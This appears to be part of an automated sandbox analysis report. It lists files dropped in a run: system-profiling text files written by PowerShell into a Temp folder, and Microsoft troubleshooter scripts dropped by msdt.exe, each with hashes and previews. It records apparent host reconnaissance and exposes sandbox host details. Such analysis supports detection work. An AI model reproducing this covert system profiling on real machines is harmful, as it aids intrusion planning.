                                                                                                                                                                Preview:..........D.H.C.P.E.n.a.b.l.e.d. . . . . . .:. .T.r.u.e.....I.P.A.d.d.r.e.s.s. . . . . . . . .:. .....D.e.f.a.u.l.t.I.P.G.a.t.e.w.a.y. .:. .....D.N.S.D.o.m.a.i.n. . . . . . . . .:. .....S.e.r.v.i.c.e.N.a.m.e. . . . . . .:. .k.d.n.i.c.....D.e.s.c.r.i.p.t.i.o.n. . . . . . .:. .M.i.c.r.o.s.o.f.t. .K.e.r.n.e.l. .D.e.b.u.g. .N.e.t.w.o.r.k. .A.d.a.p.t.e.r.....I.n.d.e.x. . . . . . . . . . . . .:. .0.........D.H.C.P.E.n.a.b.l.e.d. . . . . . .:. .F.a.l.s.e.....I.P.A.d.d.r.e.s.s. . . . . . . . .:. .{.1.9.2...1.6.8...2...3.,. .f.e.8.0.:.:.5.d.e.a.:.2.0.5.2.:.e.b.5.c.:.e.8.7.9.}.....D.e.f.a.u.l.t.I.P.G.a.t.e.w.a.y. .:. .{.1.9.2...1.6.8...2...1.}.....D.N.S.D.o.m.a.i.n. . . . . . . . .:. .....S.e.r.v.i.c.e.N.a.m.e. . . . . . .:. .e.1.i.e.x.p.r.e.s.s.....D.e.s.c.r.i.p.t.i.o.n. . . . . . .:. .I.n.t.e.l.(.R.). .8.2.5.7.4.L. .G.i.g.a.b.i.t. .N.e.t.w.o.r.k. .C.o.n.n.e.c.t.i.o.n.....I.n.d.e.x. . . . . . . . . . . . .:. .1.........D.H.C.P.E.n.a.b.l.e.d. . . . . . .:. .F.a.l.s.e.....I.P.A.d.d.r.e.s.s. . . .

                                                                                                                                                                C:\Windows\Temp\8f720a5db6c7\apps.txt

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):34378
                                                                                                                                                                Entropy (8bit):2.914480319600237
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:eklQvAws6dnB0iwK2WdVV0A1CueRGg3KLiJMlCiQiZlNIUTxuOmZrHlNL1flUstz:3H
                                                                                                                                                                MD5:E384B1F1B346CFB04FDAAA8A2472CE3C
                                                                                                                                                                SHA1:2D4F033F1CB1A5EB40C3C2BEC382AFC53113F579
                                                                                                                                                                SHA-256:D43B92E117AA2C6EE47FB37177E391A8DFA94341DD7364A6CB1E6F29D613D128
                                                                                                                                                                SHA-512:CAFF54CDB6B8E33A4BC1CEB4207B7108B79C6A21692FD52F1315CB312FB9ABA6DCD609679E459B5B3D44E05E41D0D61614BECA59A0884A090E959B6795ACFB6E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:......D.i.s.p.l.a.y.N.a.m.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .D.i.s.p.l.a.y.V.e.r.s.i.o.n. .P.u.b.l.i.s.h.e.r. . . . . . . . . . . . . . . . . . .I.n.s.t..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .a.l.l.D..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .a.t.e. .....-.-.-.-.-.-.-.-.-.-.-. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .-.-.-.-.-.-.-.-.-.-.-.-.-.-. .-.-.-.-.-.-.-.-.-. . . . . . . . . . . . . . . . . . .-.-.-.-..... . . . . . . . . . . . . .

                                                                                                                                                                C:\Windows\Temp\8f720a5db6c7\bios.txt

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):358
                                                                                                                                                                Entropy (8bit):3.372235584566867
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:QAjjs0oZ8ap2m+q8IKlIaIlwAipallefaCihJZoh/u:QAHPoZ72E8IKlIaYwAi8lLXhJZb
                                                                                                                                                                MD5:F731C49F9F7467B3BD31BD90037FC642
                                                                                                                                                                SHA1:747DC8CF070A92FE20B27FA6C0EB6BC4DF2EAECE
                                                                                                                                                                SHA-256:0F7236BB63EF86034F8C6F600036BCC69DB292165F66898288015CE3BC2F3385
                                                                                                                                                                SHA-512:3B91ED7547965DD6A9FC22C42D6715B6F2E5B1499648859C528B7BA0DD04E6A1FF19E6F2FA7E75A49262FAA7285BD86D23DDB6E35BB7FB596D5D955DF888B7E7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:..........S.M.B.I.O.S.B.I.O.S.V.e.r.s.i.o.n. .:. .4.G.H.P.S.....M.a.n.u.f.a.c.t.u.r.e.r. . . . . . .:. .A.N.3.C.B.....N.a.m.e. . . . . . . . . . . . . . .:. .V.M.W.7.1...0.0.V...1.8.2.2.7.2.1.4...B.6.4...2.1.0.6.2.5.2.2.2.0.....S.e.r.i.a.l.N.u.m.b.e.r. . . . . . .:. .M.8.E.5.X.5.3.B.1.9.....V.e.r.s.i.o.n. . . . . . . . . . . .:. .F.9.M.S.G.................

                                                                                                                                                                C:\Windows\Temp\8f720a5db6c7\cpu.txt

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):790
                                                                                                                                                                Entropy (8bit):3.1871763647552767
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:QCGmYSGmDfUUMfg9I+kWQ+S9w8vw/+WiXyG:RGmYSGmQULu+Y+mzoHiX7
                                                                                                                                                                MD5:38455CF67591FE7AE72E0A4FDB8812ED
                                                                                                                                                                SHA1:6E226D757DEBDCAED8A0ED74837077D173D97F98
                                                                                                                                                                SHA-256:C16A198FFC883668C97EE508EE7384FA99DC4572D37219EC5F0F30B49C36AD2E
                                                                                                                                                                SHA-512:47772EA54A790DD12EC9B1F15D45B8DD1F357165A6DE9614D783B317E84855891E55F6CC88C09E3EF88E0746895183EC2055640DF8C72C6F27FD94C21D9E25DB
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:..........C.a.p.t.i.o.n. . . . . . . . . . . . . . . . . . . .:. .I.n.t.e.l.6.4. .F.a.m.i.l.y. .6. .M.o.d.e.l. .8.5. .S.t.e.p.p.i.n.g. .7.....D.e.s.c.r.i.p.t.i.o.n. . . . . . . . . . . . . . . .:. .I.n.t.e.l.6.4. .F.a.m.i.l.y. .6. .M.o.d.e.l. .8.5. .S.t.e.p.p.i.n.g. .7.....N.u.m.b.e.r.O.f.C.o.r.e.s. . . . . . . . . . . . . .:. .4.....N.u.m.b.e.r.O.f.L.o.g.i.c.a.l.P.r.o.c.e.s.s.o.r.s. .:. .2.....N.a.m.e. . . . . . . . . . . . . . . . . . . . . . .:. .I.n.t.e.l.(.R.). .C.o.r.e.(.T.M.).2. .C.P.U. .6.6.0.0. .@. .2...4.0. .G.H.z.....M.a.n.u.f.a.c.t.u.r.e.r. . . . . . . . . . . . . . .:. .G.e.n.u.i.n.e.I.n.t.e.l.....S.y.s.t.e.m.C.r.e.a.t.i.o.n.C.l.a.s.s.N.a.m.e. . . .:. .W.i.n.3.2._.C.o.m.p.u.t.e.r.S.y.s.t.e.m.....V.e.r.s.i.o.n. . . . . . . . . . . . . . . . . . . .:. .................

                                                                                                                                                                C:\Windows\Temp\8f720a5db6c7\disk.txt

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):278
                                                                                                                                                                Entropy (8bit):3.2097733620466897
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:QZyrhldmfiAgGifvWy1S8lAN4HvovcA2P6pFltvWMolclUXF02vlduVnX1lSNz0s:QEYfdZ7yw0AyHwvcTo8MoGy1RWSrAvG
                                                                                                                                                                MD5:422B906819D2B3C825CD052B3A92DB20
                                                                                                                                                                SHA1:5AEC0D60923F29240E4A9115446B7C9408EA8A34
                                                                                                                                                                SHA-256:CC270C87AF59C8D94E75193D7E911C351947B76E6D5FB72C2DE619919F4F4E50
                                                                                                                                                                SHA-512:D75509A4F6D14846BC2A437DDF9F712EBF9B82C824BFA3207AE9B347EA13F4FB6295E6C064B16FEDF14B3F289C4E0410D41B71E0D9993C65772B1D00C427666C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:..........D.e.v.i.c.e.I.D. . . . . .:. .C.:.....D.r.i.v.e.T.y.p.e. . . . .:. .3.....P.r.o.v.i.d.e.r.N.a.m.e. .:. .....F.r.e.e.S.p.a.c.e. . . . .:. .3.3.8.7.9.9.2.8.8.3.2.....S.i.z.e. . . . . . . . . .:. .2.2.3.4.9.6.7.2.9.6.0.1.....V.o.l.u.m.e.N.a.m.e. . . .:. .................

                                                                                                                                                                C:\Windows\Temp\8f720a5db6c7\ip.txt

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):82
                                                                                                                                                                Entropy (8bit):3.128876068320257
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:QnlLl8JLl1LkolvklnV3+u6XSNlWZy49:QD8J0o2lnd3WZh9
                                                                                                                                                                MD5:78A0CF4A2D198D588E40BE2199E5EB0C
                                                                                                                                                                SHA1:1A32FF48A1AE722AA6358B7C023B8F219223CE51
                                                                                                                                                                SHA-256:1C0A8771B00DFD60C87B6CEB146899D9DA7055D6C41020021365C6515140E18F
                                                                                                                                                                SHA-512:7A71E34274429EE774F2E7D7FC9CA68F85A99AC6DDB30E5DD0C3AC6965DE9C57F0FF40AAF5123A9A7947A5B3C638DA13C2CBFA85D433434B2C2B8ED898C9AED2
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:..1.9.2...1.6.8...2...3.....f.e.8.0.:.:.5.d.e.a.:.2.0.5.2.:.e.b.5.c.:.e.8.7.9.....

                                                                                                                                                                C:\Windows\Temp\8f720a5db6c7\process.txt

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):30022
                                                                                                                                                                Entropy (8bit):2.037231948083465
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:X+Jak0v9tCeOD6sLMVDt/HV7GIix1dUu0kAudtOhNSvdIPMLF15PS:uZ0v9tV5Dt5g/0budtO2vdG4HhS
                                                                                                                                                                MD5:B476D700E24BDBA108DB584B36E7427C
                                                                                                                                                                SHA1:633ED5E1EA8534944FEBB9A858C2F5291CE7C949
                                                                                                                                                                SHA-256:0F94B98B364D7A2219FA5660F38E33031627F0DE60C02E2C5DE904C0DE70BA20
                                                                                                                                                                SHA-512:DB73CE72AA366C455599AEBE834F3B09E37B8A3873374AEDB780FD38279BCD4A90CF9F606057600905BAF1E94587C1364684662DFCEE8A4174AC69567222107F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:......H.a.n.d.l.e.s. . .N.P.M.(.K.). . . . .P.M.(.K.). . . . . . .W.S.(.K.). . . . . .C.P.U.(.s.). . . . . .I.d. . .S.I. .P.r.o.c.e.s.s.N.a.m.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....-.-.-.-.-.-.-. . .-.-.-.-.-.-. . . . .-.-.-.-.-. . . . . . .-.-.-.-.-. . . . . .-.-.-.-.-.-. . . . . .-.-. . .-.-. .-.-.-.-.-.-.-.-.-.-.-. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . . .2.0.8. . . . . . .1.1. . . . . .3.7.0.8. . . . . . .1.7.8.1.6. . . . . . . .0...2.7. . . .2.1.6.8. . . .1. .b.a.c.k.g.r.o.u.n.d.T.a.s.k.H.o.s.t. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . .1.0.9.1. . . . . . .3.1. . . . .1.9.4.0.0. . . . . . .5.1.6.7.2. . . . . . .2.0...5.5. . . .2.7.9.6. . . .1. .b.a.c.k.g.r.o.u.n.d.T.a.s.k.H.o.s.t. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . . .1.8.0. . . . . . .

                                                                                                                                                                C:\Windows\Temp\8f720a5db6c7\ram.txt

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3294
                                                                                                                                                                Entropy (8bit):3.264652836080392
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:v/J+IX/oW4l1pRP3rMuoW4XfxW4cl+/H5W4nMuqGWg6VpCjxNsl+lf9W4sVxA3Wx:QO4n4s4v8484TWg6VMjxNFY4sVGG4S
                                                                                                                                                                MD5:8160DE0BD461AE311225142315AB52A4
                                                                                                                                                                SHA1:7E7D156CB4F2D2C5FF1FABFFCE470FD28C17DD82
                                                                                                                                                                SHA-256:8F2799938D4C28BFB792715FB7898A831B4F1772E38327A122BABF78D3BCC62C
                                                                                                                                                                SHA-512:2F88040CA2DF227D81E5C8BFCB3B5859E47BFFC9FCA70475C4502B14199817B69DD41186A9B0D5A7D6017AB877D54EA9BA2DC4868573539AB46FB1054D5BC553
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.........._._.G.E.N.U.S. . . . . . . . . . . . . . .:. .2....._._.C.L.A.S.S. . . . . . . . . . . . . . .:. .W.i.n.3.2._.P.h.y.s.i.c.a.l.M.e.m.o.r.y....._._.S.U.P.E.R.C.L.A.S.S. . . . . . . . . .:. .C.I.M._.P.h.y.s.i.c.a.l.M.e.m.o.r.y....._._.D.Y.N.A.S.T.Y. . . . . . . . . . . . .:. .C.I.M._.M.a.n.a.g.e.d.S.y.s.t.e.m.E.l.e.m.e.n.t....._._.R.E.L.P.A.T.H. . . . . . . . . . . . .:. .W.i.n.3.2._.P.h.y.s.i.c.a.l.M.e.m.o.r.y...T.a.g.=.".P.h.y.s.i.c.a.l. .M.e.m.o.r.y. .0."....._._.P.R.O.P.E.R.T.Y._.C.O.U.N.T. . . . . .:. .3.6....._._.D.E.R.I.V.A.T.I.O.N. . . . . . . . . .:. .{.C.I.M._.P.h.y.s.i.c.a.l.M.e.m.o.r.y.,. .C.I.M._.C.h.i.p.,. .C.I.M._.P.h.y.s.i.c.a.l.C.o.m.p.o.n.e.n.t.,. .C.I.M._.P.h.y.s.i.c.a.l.E.l.e.m.e.n.t.......}....._._.S.E.R.V.E.R. . . . . . . . . . . . . .:. .D.E.S.K.T.O.P.-.7.1.6.T.7.7.1....._._.N.A.M.E.S.P.A.C.E. . . . . . . . . . .:. .r.o.o.t.\.C.I.M.V.2....._._.P.A.T.H. . . . . . . . . . . . . . . .:. .\.\.D.E.S.K.T.O.P.-.7.1.6.T.7.7.1.\.r.o.o.t.\.C.I.M.V.2.:.W.i.n.3.2._.P.

                                                                                                                                                                C:\Windows\Temp\8f720a5db6c7\summary.txt

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):430
                                                                                                                                                                Entropy (8bit):3.245935984288243
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:Q7eYKNLGe2m2OOVEflIavcF/B2IHcyHiQ2lYpvNlEGa3jAgP:Q7elLp2sS0lIakFX8yHBCMNlFC
                                                                                                                                                                MD5:584BF9F76ACD21C5FADE3C679D0D3AA5
                                                                                                                                                                SHA1:39698C73A5800937C9CA1E8D51D393292066549A
                                                                                                                                                                SHA-256:DC46DEBCB09B1FE45DE600CEB0B8DFC380F408EB2EFA99A4620C1A331C1DE56E
                                                                                                                                                                SHA-512:98DCB11F44157BC693D1236B60AB912E7EB67360113FD5B617E70F979E497A4EE0F653F52C65D4DBDF731148D2C922906CFFB7FBD818CF6D36CFC5C9E6280F4C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:..........D.o.m.a.i.n. . . . . . . . . . . . . . .:. .m.s.l.M.V.....M.a.n.u.f.a.c.t.u.r.e.r. . . . . . . . .:. .T.E.r.b.5.k.1.b.Z.Z.N.4.8.4.m.....M.o.d.e.l. . . . . . . . . . . . . . . .:. . .h. .f.m.2.D.f.....N.a.m.e. . . . . . . . . . . . . . . . .:. .D.E.S.K.T.O.P.-.7.1.6.T.7.7.1.....P.r.i.m.a.r.y.O.w.n.e.r.N.a.m.e. . . . .:. .p.r.a.t.e.s.h.....T.o.t.a.l.P.h.y.s.i.c.a.l.M.e.m.o.r.y. .:. .4.2.9.3.9.4.3.2.9.6.................

                                                                                                                                                                C:\Windows\Temp\SDIAG_5429739b-e3bc-4aa7-b049-21dfa05c9515\DiagPackage.diagpkg

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):24702
                                                                                                                                                                Entropy (8bit):4.37978533849437
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:fO3MDP8m2xaqade1tXv8v/XPSwTkal+7lOaNeHdXQZvczyJuz4UnPz0Kuz+NGTEP:O5NzuCWNaEcU8mjapMVOHW
                                                                                                                                                                MD5:191959B4C3F91BE170B30BF5D1BC2965
                                                                                                                                                                SHA1:1891E3CB588516B94FDC53794DA4DF5469A4C6D0
                                                                                                                                                                SHA-256:8EC3A8F67BAF1E4658FC772F9F35230CA1B0318DDAF7A4C84789A329B6F7F047
                                                                                                                                                                SHA-512:092CC417FBFE7F6E02A60FF169209D7B60362B585CBF92521BFC71C0B378D978DFB9265A3E48C630CE6ABAB263711D71F3917FFAF51B6FD449CFC394E9D8C3A9
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:<dcmPS:DiagnosticPackage SchemaVersion="1.0" Localized="true" xmlns:dcmPS="http://www.microsoft.com/schemas/dcm/package/2007" xmlns:dcmRS="http://www.microsoft.com/schemas/dcm/resource/2007">.. <DiagnosticIdentification>.. <ID>PCW</ID>.. <Version>3.0</Version>.. </DiagnosticIdentification>.. <DisplayInformation>.. <Parameters/>.. <Name>@diagpackage.dll,-1</Name>.. <Description>@diagpackage.dll,-2</Description>.. </DisplayInformation>.. <PrivacyLink>https://go.microsoft.com/fwlink/?LinkId=534597</PrivacyLink>.. <PowerShellVersion>2.0</PowerShellVersion>.. <SupportedOSVersion clientSupported="true" serverSupported="true">6.1</SupportedOSVersion>.. <Troubleshooter>.. <Script>.. <Parameters/>.. <ProcessArchitecture>Any</ProcessArchitecture>.. <RequiresElevation>false</RequiresElevation>.. <RequiresInteractivity>true</RequiresInteractivity>.. <FileName>TS_ProgramCompatibilityWizard.ps1</FileName>.. <ExtensionPoint/>.. </Script>..

                                                                                                                                                                C:\Windows\Temp\SDIAG_5429739b-e3bc-4aa7-b049-21dfa05c9515\DiagPackage.dll

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):66560
                                                                                                                                                                Entropy (8bit):6.926109943059805
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:ytBGLADXf3iFGQ+/ReBQBJJgUKZgyxMBGb:ytBGcDXvKoRqKuxgyx
                                                                                                                                                                MD5:6E492FFAD7267DC380363269072DC63F
                                                                                                                                                                SHA1:3281F69F93D181ADEE35BC9AD93B8E1F1BBF7ED3
                                                                                                                                                                SHA-256:456AE5D9C48A1909EE8093E5B2FAD5952987D17A0B79AAE4FFF29EB684F938A8
                                                                                                                                                                SHA-512:422E2A7B83250276B648510EA075645E0E297EF418564DDA3E8565882DBBCCB8C42976FDA9FCDA07A25F0F04A142E43ECB06437A7A14B5D5D994348526123E4E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.PE..d....J_A.........." ......................................................... .......K....`.......................................................... ..`...............................8............................................................................rdata..............................@..@.rsrc...`.... ......................@..@.....J_A........T...8...8........J_A........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#.......rsrc$02.... .....;A.(.j..x..)V...Zl4..w.E..J_A........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Windows\Temp\SDIAG_5429739b-e3bc-4aa7-b049-21dfa05c9515\RS_ProgramCompatibilityWizard.ps1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):50242
                                                                                                                                                                Entropy (8bit):4.932919499511673
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:/wugEs5GhrQzYjGBHvPbD9FZahXuDzsP6qqF8DdEakDiqeXacgcRjdhGPtQMHQF4:/c5AMHvDDf2VE+quAiMw4
                                                                                                                                                                MD5:EDF1259CD24332F49B86454BA6F01EAB
                                                                                                                                                                SHA1:7F5AA05727B89955B692014C2000ED516F65D81E
                                                                                                                                                                SHA-256:AB41C00808ADAD9CB3D76405A9E0AEE99FB6E654A8BF38DF5ABD0D161716DC27
                                                                                                                                                                SHA-512:A6762849FEDD98F274CA32EB14EC918FDBE278A332FDA170ED6D63D4C86161F2208612EB180105F238893A2D2B107228A3E7B12E75E55FDE96609C69C896EBA0
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#This is passed from the troubleshooter via 'Add-DiagRootCause'..PARAM($targetPath, $appName)....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008..#rfink - 01 Sept 2008 - rewrite to support dynamic choices....#set-psdebug -strict -trace 0....#change HKLM\Software\Windows NT\CurrentVersion\AppCompatFlags\CompatTS EnableTracing(DWORD) to 1..#if you want to enable tracing..$SpewTraceToDesktop = $false....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....#Compatibility modes..$CompatibilityModes = new-Object System.Collections.Hashtable..$CompatibilityModes.Add("Version_WIN8RTM", "WIN8RTM")..$CompatibilityModes.Add("Version_WIN7RTM", "WIN7RTM")..$CompatibilityModes.Add("Version_WINVISTA2", "VISTASP2")..$CompatibilityModes.Add("Version_WINXP3", "WINXPSP3")..$CompatibilityModes.Add("Version_MSIAUTO", "MSIAUTO")..$CompatibilityModes.Add("Version_UNKNOWN", "WINXPSP3")..$Comp

                                                                                                                                                                C:\Windows\Temp\SDIAG_5429739b-e3bc-4aa7-b049-21dfa05c9515\TS_ProgramCompatibilityWizard.ps1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16946
                                                                                                                                                                Entropy (8bit):4.860026903688885
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:3FptgXhu9IOM7BTDLwU7GHf7FajKFzB9Ww:Ghu9I9dQYWB9Ww
                                                                                                                                                                MD5:2C245DE268793272C235165679BF2A22
                                                                                                                                                                SHA1:5F31F80468F992B84E491C9AC752F7AC286E3175
                                                                                                                                                                SHA-256:4A6E9F400C72ABC5B00D8B67EA36C06E3BC43BA9468FE748AEBD704947BA66A0
                                                                                                                                                                SHA-512:AAECB935C9B4C27021977F211441FF76C71BA9740035EC439E9477AE707109CA5247EA776E2E65159DCC500B0B4324F3733E1DFB05CEF10A39BB11776F74F03C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#TS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....$ShortcutListing = New-Object System.Collections.Hashtable..$ExeListing = New-Object System.Collections.ArrayList..$CombinedListing = New-Object System.Collections.ArrayList....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....# Block PCW on unsupported SKUs..$BlockedSKUs = @(178)..[Int32]$OSSKU = (Get-WmiObject -Class "Win32_OperatingSystem").OperatingSystemSKU..if ($BlockedSKUs.Contains($OSSKU))..{.. return..}....$typeDefinition = @"....using System;..using System.IO;..using System.Runtime.InteropServices;..using System.Text;..using System.Collections;....public class Utility..{.. public static string GetStartMenuPath().. {.. return Environment.GetFolderPath(Environment.SpecialFolder.StartMenu);.. }.... public static string GetAllUsersStartMenuPath().. {.. return Path.Combine(Environ

                                                                                                                                                                C:\Windows\Temp\SDIAG_5429739b-e3bc-4aa7-b049-21dfa05c9515\VF_ProgramCompatibilityWizard.ps1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):453
                                                                                                                                                                Entropy (8bit):4.983419443697541
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:QcM3BFN+dxmVdyKVCkLZI4S2xhzoJNIDER5lI02xzS4svc3uVr:Qb3DQbeCklTxhzoJUoS02tCr
                                                                                                                                                                MD5:60A20CE28D05E3F9703899DF58F17C07
                                                                                                                                                                SHA1:98630ABC4B46C3F9BD6AF6F1D0736F2B82551CA9
                                                                                                                                                                SHA-256:B71BC60C5707337F4D4B42BA2B3D7BCD2BA46399D361E948B9C2E8BC15636DA2
                                                                                                                                                                SHA-512:2B2331B2DD28FB0BBF95DC8C6CA7E40AA56D4416C269E8F1765F14585A6B5722C689BCEBA9699DFD7D97903EF56A7A535E88EAE01DFCC493CEABB69856FFF9AA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#if this environment variable is set, we say that we don't detect the problem anymore so it will..#show as fixed in the final screen..PARAM($appName)....$detected = $true..if ($Env:AppFixed -eq $true)..{.. $detected = $false ..}....Update-DiagRootCause -id "RC_IncompatibleApplication" -iid $appName -Detected $detected....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....

                                                                                                                                                                C:\Windows\Temp\SDIAG_5429739b-e3bc-4aa7-b049-21dfa05c9515\en-US\CL_LocalizationData.psd1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):6650
                                                                                                                                                                Entropy (8bit):3.6751460885012333
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:q39pB3hpieJGhn8n/y7+aqwcQoXQZWx+cWUcYpy7I6D1RUh5EEjQB5dm:q39pRhp6Sy6wZifVEtjjFm
                                                                                                                                                                MD5:E877AD0545EB0ABA64ED80B576BB67F6
                                                                                                                                                                SHA1:4D200348AD4CA28B5EFED544D38F4EC35BFB1204
                                                                                                                                                                SHA-256:8CAC8E1DA28E288BF9DB07B2A5BDE294122C8D2A95EA460C757AE5BAA2A05F27
                                                                                                                                                                SHA-512:6055EC9A2306D9AA2F522495F736FBF4C3EB4078AD1F56A6224FF42EF525C54FF645337D2525C27F3192332FF56DDD5657C1384846678B343B2BFA68BD478A70
                                                                                                                                                                Malicious:false
